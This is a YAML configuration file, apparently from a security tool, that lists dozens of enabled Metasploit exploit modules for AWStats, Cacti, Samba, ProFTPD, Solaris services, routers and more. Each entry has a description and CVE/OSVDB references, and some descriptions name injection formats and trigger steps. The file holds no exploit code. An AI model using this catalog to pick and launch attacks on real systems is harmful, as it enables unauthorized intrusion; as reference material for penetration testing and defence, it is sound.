msf_awstats_configdir_exec:
enable: true
msf: true
msf_key: unix/webapp/awstats_configdir_exec
name: AWStats configdir Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\t\tAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\n\
\t\t\t\t\tare vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2005-0116
- - OSVDB
- "13002"
- - BID
- "12298"
- - URL
- http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_cacti_graphimage_exec:
enable: true
msf: true
msf_key: unix/webapp/cacti_graphimage_exec
name: Cacti graph_view.php Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tRaxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to\n\
\t\t\t\t0.8.6-d are vulnerable.\n\
\t\t\t"
authors:
- - OSVDB
- "17539"
- - BID
- "14042"
path: extensions/metasploit/
class: Msf_module
msf_php_xmlrpc_eval:
enable: true
msf: true
msf_key: unix/webapp/php_xmlrpc_eval
name: PHP XML-RPC Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary code execution flaw\n\
\t\t\t\tdiscovered in many implementations of the PHP XML-RPC module.\n\
\t\t\t\tThis flaw is exploitable through a number of PHP web\n\
\t\t\t\tapplications, including but not limited to Drupal, Wordpress,\n\
\t\t\t\tPostnuke, and TikiWiki.\n\
\t\t\t"
authors:
- - CVE
- 2005-1921
- - OSVDB
- "17793"
- - BID
- "14088"
path: extensions/metasploit/
class: Msf_module
msf_joomla_tinybrowser:
enable: true
msf: true
msf_key: unix/webapp/joomla_tinybrowser
name: Joomla 1.5.12 TinyBrowser File Upload Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the TinyMCE/tinybrowser plugin.\n\
\t\t\t\tThis plugin is not secured in version 1.5.12 of Joomla and allows the upload\n\
\t\t\t\tof files on the remote server.\n\
\t\t\t\tBy renaming the uploaded file this vulnerability can be used to upload/execute\n\
\t\t\t\tcode on the affected system.\n\
\t\t\t"
authors:
- - OSVDB
- "64578"
- - URL
- http://milw0rm.com/exploits/9296
- - URL
- http://developer.joomla.org/security/news/301-20090722-core-file-upload.html
path: extensions/metasploit/
class: Msf_module
msf_mitel_awc_exec:
enable: true
msf: true
msf_key: unix/webapp/mitel_awc_exec
name: Mitel Audio and Web Conferencing Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command injection flaw within the Mitel\n\
\t\t\t\tAudio and Web Conferencing web interface.\n\
\t\t\t"
authors:
- - URL
- http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14
- - OSVDB
- "69934"
path: extensions/metasploit/
class: Msf_module
msf_openview_connectednodes_exec:
enable: true
msf: true
msf_key: unix/webapp/openview_connectednodes_exec
name: HP Openview connectedNodes.ovpl Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tHP OpenView connectedNodes.ovpl CGI application. The results of the command\n\
\t\t\t\twill be displayed to the screen.\n\
\t\t\t"
authors:
- - CVE
- 2005-2773
- - OSVDB
- "19057"
- - BID
- "14662"
path: extensions/metasploit/
class: Msf_module
msf_barracuda_img_exec:
enable: true
msf: true
msf_key: unix/webapp/barracuda_img_exec
name: Barracuda IMG.PL Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tBarracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2005-2847
- - OSVDB
- "19279"
- - BID
- "14712"
- - NSS
- "19556"
- - URL
- http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1
path: extensions/metasploit/
class: Msf_module
msf_mambo_cache_lite:
enable: true
msf: true
msf_key: unix/webapp/mambo_cache_lite
name: Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote file inclusion vulnerability in\n\
\t\t\t\tincludes/Cache/Lite/Output.php in the Cache_Lite package in Mambo\n\
\t\t\t\t4.6.4 and earlier.\n\
\t\t\t"
authors:
- - CVE
- 2008-2905
- - OSVDB
- "46173"
- - BID
- "29716"
path: extensions/metasploit/
class: Msf_module
msf_pajax_remote_exec:
enable: true
msf: true
msf_key: unix/webapp/pajax_remote_exec
name: PAJAX Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tRedTeam has identified two security flaws in PAJAX (<= 0.5.1).\n\
\t\t\t\tIt is possible to execute arbitrary PHP code from unchecked user input.\n\
\t\t\t\tAdditionally, it is possible to include arbitrary files on the server\n\
\t\t\t\tending in \".class.php\".\n\
\t\t\t"
authors:
- - CVE
- 2006-1551
- - OSVDB
- "24618"
- - BID
- "17519"
- - URL
- http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php
path: extensions/metasploit/
class: Msf_module
msf_base_qry_common:
enable: true
msf: true
msf_key: unix/webapp/base_qry_common
name: BASE base_qry_common Remote File Include
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote file inclusion vulnerability in\n\
\t\t\t\tthe base_qry_common.php file in BASE 1.2.4 and earlier.\n\
\t\t\t"
authors:
- - CVE
- 2006-2685
- - OSVDB
- "49366"
- - BID
- "18298"
path: extensions/metasploit/
class: Msf_module
msf_trixbox_langchoice:
enable: true
msf: true
msf_key: unix/webapp/trixbox_langchoice
name: Trixbox langChoice PHP Local File Inclusion
category: Metasploit
description: "\n\
\t\t\t\t\tThis module injects PHP into the Trixbox session file and then, in a second call, evaluates\n\
\t\t\t\tthat code by manipulating the langChoice parameter as described in OSVDB-50421.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_redmine_scm_exec:
enable: true
msf: true
msf_key: unix/webapp/redmine_scm_exec
name: Redmine SCM Repository Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tRedmine repository controller. The flaw is triggered when a rev parameter\n\
\t\t\t\tis passed to the command line of the SCM tool without adequate filtering.\n\
\t\t\t"
authors:
- - OSVDB
- "70090"
- - URL
- http://www.redmine.org/news/49
path: extensions/metasploit/
class: Msf_module
msf_heap_noir:
enable: true
msf: true
msf_key: solaris/dtspcd/heap_noir
name: Solaris dtspcd Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a port of noir's dtspcd exploit. This module should\n\
\t\t\t\twork against any vulnerable version of Solaris 8 (sparc).\n\
\t\t\t\tThe original exploit code was published in the book\n\
\t\t\t\tShellcoder's Handbook.\n\
\t\t\t"
authors:
- - CVE
- 2001-0803
- - OSVDB
- "4503"
- - BID
- "3517"
- - URL
- http://www.cert.org/advisories/CA-2001-31.html
- - URL
- http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip
path: extensions/metasploit/
class: Msf_module
msf_ttyprompt:
enable: true
msf: true
msf_key: solaris/telnet/ttyprompt
name: Solaris in.telnetd TTYPROMPT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module uses a buffer overflow in the Solaris 'login'\n\
\t\t\tapplication to bypass authentication in the telnet daemon.\n\
\t\t\t"
authors:
- - CVE
- 2001-0797
- - OSVDB
- "690"
- - BID
- "5531"
path: extensions/metasploit/
class: Msf_module
msf_fuser:
enable: true
msf: true
msf_key: solaris/telnet/fuser
name: Sun Solaris Telnet Remote Authentication Bypass Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits the argument injection vulnerability\n\
\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\n\
\t\t\t"
authors:
- - CVE
- 2007-0882
- - OSVDB
- "31881"
- - BID
- "22512"
path: extensions/metasploit/
class: Msf_module
msf_trans2open:
enable: true
msf: true
msf_key: freebsd/samba/trans2open
name: Samba trans2open Overflow (*BSD x86)
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits the buffer overflow found in Samba versions\n\
\t\t\t\t2.2.0 to 2.2.8. This particular module is capable of\n\
\t\t\t\texploiting the flaw on x86 Linux systems that do not\n\
\t\t\t\thave the noexec stack option set.\n\
\t\t\t"
authors:
- - CVE
- 2003-0201
- - OSVDB
- "4469"
- - BID
- "7294"
- - URL
- http://seclists.org/bugtraq/2003/Apr/103
path: extensions/metasploit/
class: Msf_module
msf_lsa_transnames_heap:
enable: true
msf: true
msf_key: osx/samba/lsa_transnames_heap
name: Samba lsa_io_trans_names Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module triggers a heap overflow in the LSA RPC service\n\
\t\t\tof the Samba daemon. This module uses szone_free() to overwrite\n\
\t\t\tthe size() or free() pointer in initial_malloc_zones structure.\n\
\t\t\t"
authors:
- - CVE
- 2007-2446
- - OSVDB
- "34699"
path: extensions/metasploit/
class: Msf_module
msf_sadmind_adm_build_path:
enable: true
msf: true
msf_key: solaris/sunrpc/sadmind_adm_build_path
name: Sun Solaris sadmind adm_build_path() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow vulnerability in the adm_build_path()\n\
\t\t\t\tfunction of the sadmind daemon.\n\n\
\t\t\t\tThe distributed system administration daemon (sadmind) is the daemon used by\n\
\t\t\t\tSolstice AdminSuite applications to perform distributed system administration\n\
\t\t\t\toperations.\n\n\
\t\t\t\tThe sadmind daemon is started automatically by the inetd daemon whenever a\n\
\t\t\t\trequest to invoke an operation is received. The sadmind daemon process\n\
\t\t\t\tcontinues to run for 15 minutes after the last request is completed, unless a\n\
\t\t\t\tdifferent idle-time is specified with the -i command line option. The sadmind\n\
\t\t\t\tdaemon may be started independently from the command line, for example, at\n\
\t\t\t\tsystem boot time. In this case, the -i option has no effect; sadmind continues\n\
\t\t\t\tto run, even if there are no active requests.\n\
\t\t\t"
authors:
- - CVE
- 2008-4556
- - OSVDB
- "49111"
- - URL
- http://risesecurity.org/advisories/RISE-2008001.txt
path: extensions/metasploit/
class: Msf_module
msf_sadmind_exec:
enable: true
msf: true
msf_key: solaris/sunrpc/sadmind_exec
name: Solaris sadmind Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit targets a weakness in the default security\n\
\t\t\t\tsettings of the sadmind RPC application. This server is\n\
\t\t\t\tinstalled and enabled by default on most versions of the\n\
\t\t\t\tSolaris operating system.\n\n\
\t\t\t\tVulnerable systems include Solaris 2.7, 8, and 9.\n\
\t\t\t"
authors:
- - CVE
- 2003-0722
- - OSVDB
- "4585"
- - BID
- "8615"
- - URL
- http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html
path: extensions/metasploit/
class: Msf_module
msf_ypupdated_exec:
enable: true
msf: true
msf_key: solaris/sunrpc/ypupdated_exec
name: Solaris ypupdated Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis exploit targets a weakness in the way the ypupdated RPC\n\
\t\t\t\tapplication uses the command shell when handling a MAP UPDATE\n\
\t\t\t\trequest. Extra commands may be launched through this command\n\
\t\t\t\tshell, which runs as root on the remote host, by passing\n\
\t\t\t\tcommands in the format '|<command>'.\n\n\
\t\t\t\tVulnerable systems include Solaris 2.7, 8, 9, and 10, when\n\
\t\t\t\typupdated is started with the '-i' command-line option.\n\
\t\t\t"
authors:
- - CVE
- 1999-0209
- - OSVDB
- "11517"
- - BID
- "1749"
path: extensions/metasploit/
class: Msf_module
msf_sendmail_exec:
enable: true
msf: true
msf_key: solaris/lpd/sendmail_exec
name: Solaris LPD Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution flaw in\n\
\t\t\t\tthe in.lpd service shipped with all versions of Sun Solaris\n\
\t\t\t\tup to and including 8.0. This module uses a technique\n\
\t\t\t\tdiscovered by Dino Dai Zovi to exploit the flaw without\n\
\t\t\t\tneeding to know the resolved name of the attacking system.\n\
\t\t\t"
authors:
- - CVE
- 2001-1583
- - OSVDB
- "15131"
- - BID
- "3274"
path: extensions/metasploit/
class: Msf_module
msf_gld_postfix:
enable: true
msf: true
msf_key: linux/misc/gld_postfix
name: GLD (Greylisting Daemon) Postfix Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the Salim Gasmi\n\
\t\t\t\tGLD <= 1.4 greylisting daemon for Postfix. By sending an\n\
\t\t\t\toverly long string the stack can be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2005-1099
- - OSVDB
- "15492"
- - BID
- "13129"
- - URL
- http://www.milw0rm.com/exploits/934
path: extensions/metasploit/
class: Msf_module
msf_ib_inet_connect:
enable: true
msf: true
msf_key: linux/misc/ib_inet_connect
name: Borland InterBase INET_connect() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted service attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38605"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_netsupport_manager_agent:
enable: true
msf: true
msf_key: linux/misc/netsupport_manager_agent
name: NetSupport Manager Agent Remote Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in NetSupport Manager Agent. It\n\
\t\t\t\tuses a ROP chain similar to that of the proftpd_iac exploit in order to bypass a non-executable stack.\n\
\t\t\t"
authors:
- - CVE
- 2011-0404
- - OSVDB
- "70408"
- - BID
- "45728"
- - URL
- http://seclists.org/fulldisclosure/2011/Jan/90
- - URL
- http://www.exploit-db.com/exploits/15937/
path: extensions/metasploit/
class: Msf_module
msf_lprng_format_string:
enable: true
msf: true
msf_key: linux/misc/lprng_format_string
name: LPRng use_syslog Remote Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in the LPRng print server.\n\
\t\t\t\tThis vulnerability was discovered by Chris Evans. There was a publicly\n\
\t\t\t\tcirculating worm targeting this vulnerability, which prompted RedHat to pull\n\
\t\t\t\ttheir 7.0 release. They consequently re-released it as \"7.0-respin\".\n\
\t\t\t"
authors:
- - CVE
- 2000-0917
- - OSVDB
- "421"
- - BID
- "1712"
- - US-CERT-VU
- "382365"
- - URL
- http://www.cert.org/advisories/CA-2000-22.html
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=17756
- - URL
- http://www.exploit-db.com/exploits/226
- - URL
- http://www.exploit-db.com/exploits/227
- - URL
- http://www.exploit-db.com/exploits/230
path: extensions/metasploit/
class: Msf_module
msf_ib_open_marker_file:
enable: true
msf: true
msf_key: linux/misc/ib_open_marker_file
name: Borland InterBase open_marker_file() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5244
- - OSVDB
- "38610"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_accellion_fta_mpipe2:
enable: true
msf: true
msf_key: linux/misc/accellion_fta_mpipe2
name: Accellion File Transfer Appliance MPIPE2 Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a chain of vulnerabilities in the Accellion \n\
\t\t\t\tFile Transfer appliance. This appliance exposes a UDP service on \n\
\t\t\t\tport 8812 that acts as a gateway to the internal communication bus. \n\
\t\t\t\tThis service uses Blowfish encryption for authentication, but the \n\
\t\t\t\tappliance ships with two easy to guess default authentication keys. \n\
\t\t\t\tThis module abuses the known default encryption keys to inject a \n\
\t\t\t\tmessage into the communication bus. In order to execute arbitrary \n\
\t\t\t\tcommands on the remote appliance, a message is injected into the bus \n\
\t\t\t\tdestined for the 'matchrep' service. This service exposes a function \n\
\t\t\t\tnamed 'insert_plugin_meta_info' which is vulnerable to an input \n\
\t\t\t\tvalidation flaw in a call to system(). This provides access to the \n\
\t\t\t\t'soggycat' user account, which has sudo privileges to run the \n\
\t\t\t\tprimary admin tool as root. These two flaws are fixed in update\n\
\t\t\t\tversion FTA_8_0_562.\n\
\t\t\t"
authors:
- - OSVDB
- "71362"
- - OSVDB
- "71363"
- - URL
- http://www.rapid7.com/security-center/advisories/R7-0039.jsp
path: extensions/metasploit/
class: Msf_module
msf_ib_pwd_db_aliased:
enable: true
msf: true
msf_key: linux/misc/ib_pwd_db_aliased
name: Borland InterBase PWD_db_aliased() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38607"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_drb_remote_codeexec:
enable: true
msf: true
msf_key: linux/misc/drb_remote_codeexec
name: Distributed Ruby Send instance_eval/syscall Code Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits remote code execution vulnerabilities in dRuby.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_ib_jrd8_create_database:
enable: true
msf: true
msf_key: linux/misc/ib_jrd8_create_database
name: Borland InterBase jrd8_create_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38606"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_hplip_hpssd_exec:
enable: true
msf: true
msf_key: linux/misc/hplip_hpssd_exec
name: hplip hpssd.py From Address Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability in the hpssd.py\n\
\t\t\t\tdaemon of the Hewlett-Packard Linux Imaging and Printing Project.\n\
\t\t\t\tAccording to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.\n\n\
\t\t\t\tThis module was written and tested using the Fedora 6 Linux distribution.\n\
\t\t\t\tOn the test system, the daemon listens on localhost only and runs with\n\
\t\t\t\troot privileges. Although the configuration shows the daemon is to\n\
\t\t\t\tlisten on port 2207, it actually listens on a dynamic port.\n\n\
\t\t\t\tNOTE: If the target system does not have a 'sendmail' command installed,\n\
\t\t\t\tthis vulnerability cannot be exploited.\n\
\t\t\t"
authors:
- - CVE
- 2007-5208
- - OSVDB
- "41693"
- - BID
- "26054"
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=319921
- - URL
- https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit
path: extensions/metasploit/
class: Msf_module
msf_mysql_yassl_getname:
enable: true
msf: true
msf_key: linux/mysql/mysql_yassl_getname
name: MySQL yaSSL CertDecoder::GetName Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\n\
\t\t\t\timplementation bundled with MySQL. By sending a specially crafted\n\
\t\t\t\tclient certificate, an attacker can execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is present within the CertDecoder::GetName function inside\n\
\t\t\t\t\"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\n\
\t\t\t\twithin a parent function's stack frame.\n\n\
\t\t\t\tNOTE: This vulnerability requires a non-default configuration. First, the attacker\n\
\t\t\t\tmust be able to pass the host-based authentication. Next, the server must be\n\
\t\t\t\tconfigured to listen on an accessible network interface. Lastly, the server\n\
\t\t\t\tmust have been manually configured to use SSL.\n\n\
\t\t\t\tThe binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\n\
\t\t\t\ton Windows XP SP3, these protections successfully prevented exploitation.\n\n\
\t\t\t\tTesting was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\n\
\t\t\t\tpresent, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\n\
\t\t\t\tpackage were not exploitable due to the use of the compiler's FORTIFY feature.\n\n\
\t\t\t\tAlthough suse11 was mentioned in the original blog post, the binary package they\n\
\t\t\t\tprovide does not contain yaSSL or support SSL.\n\
\t\t\t"
authors:
- - CVE
- 2009-4484
- - BID
- "37640"
- - BID
- "37943"
- - BID
- "37974"
- - OSVDB
- "61956"
- - URL
- http://secunia.com/advisories/38344/
- - URL
- http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html
path: extensions/metasploit/
class: Msf_module
msf_mysql_yassl_hello:
enable: true
msf: true
msf_key: windows/mysql/mysql_yassl_hello
name: MySQL yaSSL SSL Hello Message Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n\
\t\t\t\timplementation bundled with MySQL <= 6.0. By sending a specially crafted\n\
\t\t\t\tHello packet, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0226
- - OSVDB
- "41195"
- - BID
- "27140"
path: extensions/metasploit/
class: Msf_module
msf_proftp_telnet_iac:
enable: true
msf: true
msf_key: freebsd/ftp/proftp_telnet_iac
name: ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in versions of ProFTPD\n\
\t\t\t\tserver between versions 1.3.2rc3 and 1.3.3b. By sending data containing a\n\
\t\t\t\tlarge number of Telnet IAC commands, an attacker can corrupt memory and\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-4221
- - OSVDB
- "68985"
- - BID
- "44562"
path: extensions/metasploit/
class: Msf_module
msf_proftp_sreplace:
enable: true
msf: true
msf_key: linux/ftp/proftp_sreplace
name: ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in versions 1.2 through\n\
\t\t\t\t1.3.0 of ProFTPD server. The vulnerability is within the \"sreplace\" function\n\
\t\t\t\twithin the \"src/support.c\" file.\n\n\
\t\t\t\tThe off-by-one heap overflow bug in the ProFTPD sreplace function has been\n\
\t\t\t\tdiscovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit\n\
\t\t\t\tthis off-by-one bug via MKD command, but failed. We did not work on this bug\n\
\t\t\t\tsince then.\n\n\
\t\t\t\tActually, there exist at least two bugs in the sreplace function: one is the\n\
\t\t\t\tmentioned off-by-one heap overflow bug, the other is a stack-based buffer overflow\n\
\t\t\t\tvia 'sstrncpy(dst,src,negative argument)'.\n\n\
\t\t\t\tWe were unable to reach the \"sreplace\" stack bug on ProFTPD 1.2.10 stable\n\
\t\t\t\tversion, but the version 1.3.0rc3 introduced some interesting changes, among them:\n\n\
\t\t\t\t1. another (integer) overflow in sreplace!\n\
\t\t\t\t2. now it is possible to reach sreplace stack-based buffer overflow bug via\n\
\t\t\t\t\tthe \"pr_display_file\" function!\n\
\t\t\t\t3. stupid '.message' file display bug\n\n\
\t\t\t\tSo we decided to choose ProFTPD 1.3.0 as a target for our exploit.\n\
\t\t\t\tTo reach the bug, you need to upload a specially created .message file to a\n\
\t\t\t\twriteable directory, then do \"CWD <writeable directory>\" to trigger the invocation\n\
\t\t\t\tof sreplace function.\n\n\
\t\t\t\tNote that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'\n\
\t\t\t\tfile you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.\n\n\
\t\t\t\tThe exploit is a part of VulnDisco Pack since Dec 2005.\n\
\t\t\t"
authors:
- - CVE
- 2006-5815
- - OSVDB
- "68985"
- - BID
- "20992"
- - URL
- http://seclists.org/bugtraq/2006/Nov/94
- - URL
- http://seclists.org/bugtraq/2006/Nov/538
- - URL
- http://bugs.proftpd.org/show_bug.cgi?id=2858
- - URL
- http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h
path: extensions/metasploit/
class: Msf_module
msf_imap_uw_lsub:
enable: true
msf: true
msf_key: linux/imap/imap_uw_lsub
name: UoW IMAP server LSUB Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the 'LSUB'\n\
\t\t\t\tcommand of the University of Washington IMAP service.\n\
\t\t\t\tThis vulnerability can only be exploited with a valid username\n\
\t\t\t\tand password.\n\
\t\t\t"
authors:
- - CVE
- 2000-0284
- - OSVDB
- "12037"
- - BID
- "1110"
- - URL
- http://www.milw0rm.com/exploits/284
path: extensions/metasploit/
class: Msf_module
msf_squid_ntlm_authenticate:
enable: true
msf: true
msf_key: linux/proxy/squid_ntlm_authenticate
name: Squid NTLM Authenticate Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for Squid's NTLM authenticate overflow\n\
\t\t\t\t(libntlmssp.c). Due to improper bounds checking in\n\
\t\t\t\tntlm_check_auth, it is possible to overflow the 'pass'\n\
\t\t\t\tvariable on the stack with user controlled data of a user\n\
\t\t\t\tdefined length. Props to iDEFENSE for the advisory.\n\
\t\t\t"
authors:
- - CVE
- 2004-0541
- - OSVDB
- "6791"
- - URL
- http://www.idefense.com/application/poi/display?id=107
- - BID
- "10500"
path: extensions/metasploit/
class: Msf_module
msf_alcatel_omnipcx_mastercgi_exec:
enable: true
msf: true
msf_key: linux/http/alcatel_omnipcx_mastercgi_exec
name: Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\
\t\t\t\tHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\n\
\t\t\t\tCommunication Server 7.1 and earlier. The Unified Maintenance Tool\n\
\t\t\t\tcontains a 'masterCGI' binary which allows an unauthenticated attacker\n\
\t\t\t\tto execute arbitrary commands by specifying shell metacharacters as the\n\
\t\t\t\t'user' within the 'ping' action to obtain 'httpd' user access. This\n\
\t\t\t\tmodule only supports command line payloads, as the httpd process kills\n\
\t\t\t\tthe reverse/bind shell spawn after the HTTP 200 OK response.\n\
\t\t\t"
authors:
- - OSVDB
- "40521"
- - BID
- "25694"
- - CVE
- 2007-3010
- - URL
- http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm
path: extensions/metasploit/
class: Msf_module
msf_piranha_passwd_exec:
enable: true
msf: true
msf_key: linux/http/piranha_passwd_exec
name: RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module abuses two flaws - a metacharacter injection vulnerability in the\n\
\t\t\t\tHTTP management server of RedHat 6.2 systems running the Piranha\n\
\t\t\t\tLVS cluster service and GUI (rpm packages: piranha and piranha-gui).\n\
\t\t\t\tThe vulnerability allows an authenticated attacker to execute arbitrary\n\
\t\t\t\tcommands as the Apache user account (nobody) within the\n\
\t\t\t\t/piranha/secure/passwd.php3 script. The package installs with a default\n\
\t\t\t\tuser and password of piranha:q which was exploited in the wild.\n\
\t\t\t"
authors:
- - CVE
- 2000-0248
- - OSVDB
- "289"
- - BID
- "1148"
- - CVE
- 2000-0322
- - OSVDB
- "1300"
- - BID
- "1149"
path: extensions/metasploit/
class: Msf_module
msf_linksys_apply_cgi:
enable: true
msf: true
msf_key: linux/http/linksys_apply_cgi
name: Linksys WRT54 Access Point apply.cgi Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.\n\
\t\t\t\tAccording to iDefense who discovered this vulnerability, all WRT54G versions prior to\n\
\t\t\t\t4.20.7 and all WRT54GS versions prior to 1.05.2 may be affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-2799
- - OSVDB
- "19389"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305
path: extensions/metasploit/
class: Msf_module
msf_ddwrt_cgibin_exec:
enable: true
msf: true
msf_key: linux/http/ddwrt_cgibin_exec
name: DD-WRT HTTP Daemon Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\
\t\t\t\tHTTP management server of wireless gateways running DD-WRT. This flaw\n\
\t\t\t\tallows an unauthenticated attacker to execute arbitrary commands as\n\
\t\t\t\tthe root user account.\n\
\t\t\t"
authors:
- - CVE
- 2009-2765
- - OSVDB
- "55990"
- - BID
- "35742"
- - URL
- http://www.milw0rm.com/exploits/9209
path: extensions/metasploit/
class: Msf_module
msf_gpsd_format_string:
enable: true
msf: true
msf_key: linux/http/gpsd_format_string
name: Berlios GPSD Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in the Berlios GPSD server.\n\
\t\t\t\tThis vulnerability was discovered by Kevin Finisterre.\n\
\t\t\t"
authors:
- - CVE
- 2004-1388
- - OSVDB
- "13199"
- - BID
- "12371"
- - URL
- http://www.securiteam.com/unixfocus/5LP0M1PEKK.html
path: extensions/metasploit/
class: Msf_module
msf_peercast_url:
enable: true
msf: true
msf_key: windows/http/peercast_url
name: PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in PeerCast <= v0.1216.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within the\n\
\t\t\t\thandling of URL parameters.\n\
\t\t\t"
authors:
